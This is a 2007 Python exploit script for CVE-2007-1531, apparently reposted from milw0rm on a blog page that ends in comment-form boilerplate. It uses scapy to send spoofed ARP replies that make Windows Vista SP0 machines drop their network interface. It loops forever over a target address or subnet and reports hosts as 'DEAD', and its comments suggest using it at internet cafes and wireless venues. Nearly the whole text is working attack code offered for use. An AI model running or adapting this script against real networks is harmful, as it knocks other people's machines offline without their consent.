#!/usr/bin/env python
#
# :: Kristian Hermansen ::
# Date: 20070514
# Reference: CVE-2007-1531
# Description: Mcft Windows Vista (SP0) dumps interfaces when
# it receives this ARP packet.  This DoS is useful for an internet
# cafe, wireless venue, or legitimate local attack.  The victim will
# need to manually refresh their network interface.  OK, sure
# it's a dumb local attack, but why does Vista disable iface!?!??
# -> Thanks to Newsham / Hoagland
# Vulnerable: Mcft Windows Vista (SP0) [All Versions]
# Tested:
# * victim == Windows Vista Enterprise (SP0) [English]
# * attacker == Ubuntu Feisty (7.04)
# Usage: python fISTArp.py
# Depends: scapy.py
# [?] If you don't have scapy
# [+] wget http://hg.secdev.org/scapy/raw-file/tip/scapy.py

from sys import argv
from os import geteuid
from scapy import Ether,ARP,send,srp,conf
from time import sleep

conf.verb = 0

def head():
   print """
                      __ ___ ____ _____  _                
                     / _|_ _/ ___|_   _|/ \   _ __ _ __  
                    | |_ | |\___ \ | | / _ \ | '__| '_ \
                    |  _|| | ___) || |/ ___ \| |  | |_) |
                    |_| |___|____/ |_/_/   \_\_|  | .__/
                                                  |_|    

   """

def isroot():
   if geteuid() != 0:
       print "TRY AGAIN AS ROOT SILLY..."
       return False
   else:
       return True

def usage():
   print "usage:", argv[0], ""
   print "examples:", argv[0], "192.168.1.100"
   print "examples:", argv[0], "192.168.1.0/24\n"

def fisting():
   arp_fist = ARP(pdst=argv[1],op=2)
   print "We are going to loop forever, CTRL-C to stop...\n"
   while True:
       sleep(3)
       for a in arp_fist:
           arping = Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=a.pdst)
           ans,unans = srp(arping,timeout=0.1)
           if len(ans) == 1:
               a.psrc=a.pdst
               print a.pdst, "is ALIVE!"
               print "* Time to shut it down!"
               send(a)
               ans2,unans2 = srp(arping,timeout=0.1)
               if len(unans2) == 1:
                   print "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"
                   print "@@@", a.psrc, "was rubber fisted!"
                   print "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"
                   sleep(3)
               else:
                   print "FAILED:", a.pdst, "is still alive :-("
           else:
               print a.pdst, "is already DEAD!"
           print

head()
if isroot() != True:
   exit(1)
if len(argv) != 2:
   usage()
   exit(1)
else:
   fisting()

# u.b.u.n.t.u n.e.t.s.n.i.p.e.r t.h.c.t.e.st.

# milw0rm.com [2007-05-15]
Tags: ,
Bug&Exp | Comments(0) | Trackbacks(0) | Reads(8668)
Add a comment
Emots
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
Enable HTML
Enable UBB
Enable Emots
Hidden
Nickname   Password   Optional
Site URI   Email   [Register]
               

Security code Case insensitive